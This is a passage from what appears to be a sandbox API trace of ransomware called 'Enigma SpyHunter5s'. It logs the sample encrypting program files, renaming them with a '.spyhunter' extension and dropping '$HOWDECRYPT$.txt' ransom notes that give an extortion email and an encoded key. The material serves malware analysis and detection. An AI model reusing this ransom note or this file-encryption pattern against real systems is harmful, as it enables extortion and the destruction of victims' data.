dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.352] GetProcessHeap () returned 0x2c0000 [0087.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0087.353] GetProcessHeap () returned 0x2c0000 [0087.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374048 | out: hHeap=0x2c0000) returned 1 [0087.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.362] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.362] WriteFile (in: hFile=0x170, lpBuffer=0x57fdf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff1c, lpOverlapped=0x0 | out: lpBuffer=0x57fdf3*, lpNumberOfBytesWritten=0x57ff1c*=0x127, lpOverlapped=0x0) returned 1 [0087.362] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.362] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff1c*=0x2ac, lpOverlapped=0x0) returned 1 [0087.363] CloseHandle (hObject=0x170) returned 1 [0087.363] GetProcessHeap () returned 0x2c0000 [0087.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329188 | out: hHeap=0x2c0000) returned 1 [0087.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57feb8 | out: pbBuffer=0x57feb8) returned 1 [0087.363] GetProcessHeap () returned 0x2c0000 [0087.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x57feb0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x57feb0*=0x30) returned 1 [0087.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.364] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0087.364] StrStrW (lpFirst="MSCDM.DLL", lpSrch=".txt") returned 0x0 [0087.364] GetProcessHeap () returned 0x2c0000 [0087.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x378050 [0087.364] ReadFile (in: hFile=0x170, lpBuffer=0x378050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesRead=0x57fe74*=0x2800, lpOverlapped=0x0) returned 1 [0087.404] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.404] WriteFile (in: hFile=0x170, lpBuffer=0x378050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesWritten=0x57fe74*=0x2800, lpOverlapped=0x0) returned 1 [0087.404] GetProcessHeap () returned 0x2c0000 [0087.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378050 | out: hHeap=0x2c0000) returned 1 [0087.404] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.404] WriteFile (in: hFile=0x170, lpBuffer=0x57feb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x57feb4*, lpNumberOfBytesWritten=0x57fe74*=0x4, lpOverlapped=0x0) returned 1 [0087.412] WriteFile (in: hFile=0x170, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x57fe74*=0x30, lpOverlapped=0x0) returned 1 [0087.412] CloseHandle (hObject=0x170) returned 1 [0087.436] GetProcessHeap () returned 0x2c0000 [0087.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387158 [0087.437] wnsprintfW (in: pszDest=0x387158, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.spyhunter") returned 86 [0087.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.spyhunter")) returned 1 [0087.437] GetProcessHeap () returned 0x2c0000 [0087.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387158 | out: hHeap=0x2c0000) returned 1 [0087.437] GetProcessHeap () returned 0x2c0000 [0087.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.437] GetProcessHeap () returned 0x2c0000 [0087.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374130 | out: hHeap=0x2c0000) returned 1 [0087.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57feb8 | out: pbBuffer=0x57feb8) returned 1 [0087.437] GetProcessHeap () returned 0x2c0000 [0087.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x57feb0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x57feb0*=0x30) returned 1 [0087.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.438] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0087.438] StrStrW (lpFirst="OARPMANR.DLL", lpSrch=".txt") returned 0x0 [0087.438] GetProcessHeap () returned 0x2c0000 [0087.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.438] ReadFile (in: hFile=0x170, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x57fe74*=0x2800, lpOverlapped=0x0) returned 1 [0087.494] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.494] WriteFile (in: hFile=0x170, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x57fe74*=0x2800, lpOverlapped=0x0) returned 1 [0087.495] GetProcessHeap () returned 0x2c0000 [0087.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.495] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.495] WriteFile (in: hFile=0x170, lpBuffer=0x57feb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x57feb4*, lpNumberOfBytesWritten=0x57fe74*=0x4, lpOverlapped=0x0) returned 1 [0087.495] WriteFile (in: hFile=0x170, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe74, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x57fe74*=0x30, lpOverlapped=0x0) returned 1 [0087.495] CloseHandle (hObject=0x170) returned 1 [0087.505] GetProcessHeap () returned 0x2c0000 [0087.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3972e0 [0087.506] wnsprintfW (in: pszDest=0x3972e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.spyhunter") returned 87 [0087.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.spyhunter")) returned 1 [0087.547] GetProcessHeap () returned 0x2c0000 [0087.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3972e0 | out: hHeap=0x2c0000) returned 1 [0087.547] GetProcessHeap () returned 0x2c0000 [0087.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.547] GetProcessHeap () returned 0x2c0000 [0087.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372de0 | out: hHeap=0x2c0000) returned 1 [0087.547] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57feb0 | out: pbBuffer=0x57feb0) returned 1 [0087.547] GetProcessHeap () returned 0x2c0000 [0087.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x57fea8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x57fea8*=0x30) returned 1 [0087.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.550] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0087.550] StrStrW (lpFirst="Oarpmany.exe", lpSrch=".txt") returned 0x0 [0087.550] GetProcessHeap () returned 0x2c0000 [0087.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x378050 [0087.550] ReadFile (in: hFile=0x170, lpBuffer=0x378050, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesRead=0x57fe6c*=0x2800, lpOverlapped=0x0) returned 1 [0087.609] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.609] WriteFile (in: hFile=0x170, lpBuffer=0x378050*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x378050*, lpNumberOfBytesWritten=0x57fe6c*=0x2800, lpOverlapped=0x0) returned 1 [0087.609] GetProcessHeap () returned 0x2c0000 [0087.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x378050 | out: hHeap=0x2c0000) returned 1 [0087.609] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.610] WriteFile (in: hFile=0x170, lpBuffer=0x57feac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x57feac*, lpNumberOfBytesWritten=0x57fe6c*=0x4, lpOverlapped=0x0) returned 1 [0087.627] WriteFile (in: hFile=0x170, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x57fe6c*=0x30, lpOverlapped=0x0) returned 1 [0087.627] CloseHandle (hObject=0x170) returned 1 [0087.709] GetProcessHeap () returned 0x2c0000 [0087.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3972e0 [0087.709] wnsprintfW (in: pszDest=0x3972e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe.spyhunter") returned 82 [0087.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe.spyhunter")) returned 1 [0087.710] GetProcessHeap () returned 0x2c0000 [0087.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3972e0 | out: hHeap=0x2c0000) returned 1 [0087.710] GetProcessHeap () returned 0x2c0000 [0087.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.710] GetProcessHeap () returned 0x2c0000 [0087.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x385360 | out: hHeap=0x2c0000) returned 1 [0087.710] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57feb0 | out: pbBuffer=0x57feb0) returned 1 [0087.710] GetProcessHeap () returned 0x2c0000 [0087.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0087.711] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x57fea8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x57fea8*=0x30) returned 1 [0087.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0087.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0087.711] StrStrW (lpFirst="msoshext.dll", lpSrch=".txt") returned 0x0 [0087.711] GetProcessHeap () returned 0x2c0000 [0087.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x375808 [0087.711] ReadFile (in: hFile=0x170, lpBuffer=0x375808, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesRead=0x57fe6c*=0x2800, lpOverlapped=0x0) returned 1 [0087.714] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.714] WriteFile (in: hFile=0x170, lpBuffer=0x375808*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x375808*, lpNumberOfBytesWritten=0x57fe6c*=0x2800, lpOverlapped=0x0) returned 1 [0087.715] GetProcessHeap () returned 0x2c0000 [0087.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0087.715] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.715] WriteFile (in: hFile=0x170, lpBuffer=0x57feac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x57feac*, lpNumberOfBytesWritten=0x57fe6c*=0x4, lpOverlapped=0x0) returned 1 [0087.783] WriteFile (in: hFile=0x170, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe6c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x57fe6c*=0x30, lpOverlapped=0x0) returned 1 [0087.783] CloseHandle (hObject=0x170) returned 1 [0087.895] GetProcessHeap () returned 0x2c0000 [0087.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a6878 [0087.896] wnsprintfW (in: pszDest=0x3a6878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.spyhunter") returned 82 [0087.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll.spyhunter")) returned 1 [0087.897] GetProcessHeap () returned 0x2c0000 [0087.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a6878 | out: hHeap=0x2c0000) returned 1 [0087.897] GetProcessHeap () returned 0x2c0000 [0087.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.897] GetProcessHeap () returned 0x2c0000 [0087.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3850c0 | out: hHeap=0x2c0000) returned 1 [0087.897] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0087.934] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0087.934] WriteFile (in: hFile=0x16c, lpBuffer=0x57fddf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff08, lpOverlapped=0x0 | out: lpBuffer=0x57fddf*, lpNumberOfBytesWritten=0x57ff08*=0x127, lpOverlapped=0x0) returned 1 [0087.935] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0087.936] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff08*=0x2ac, lpOverlapped=0x0) returned 1 [0087.944] CloseHandle (hObject=0x16c) returned 1 [0087.944] GetProcessHeap () returned 0x2c0000 [0087.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a340 | out: hHeap=0x2c0000) returned 1 [0087.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0088.254] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.254] WriteFile (in: hFile=0x15c, lpBuffer=0x57fddb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff04, lpOverlapped=0x0 | out: lpBuffer=0x57fddb*, lpNumberOfBytesWritten=0x57ff04*=0x127, lpOverlapped=0x0) returned 1 [0088.255] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.255] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ff04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ff04*=0x2ac, lpOverlapped=0x0) returned 1 [0088.255] CloseHandle (hObject=0x15c) returned 1 [0088.255] GetProcessHeap () returned 0x2c0000 [0088.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375808 | out: hHeap=0x2c0000) returned 1 [0088.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0088.256] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.256] WriteFile (in: hFile=0x15c, lpBuffer=0x57fdd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ff00, lpOverlapped=0x0 | out: lpBuffer=0x57fdd7*, lpNumberOfBytesWritten=0x57ff00*=0x127, lpOverlapped=0x0) returned 1 [0088.257] lstrlenA 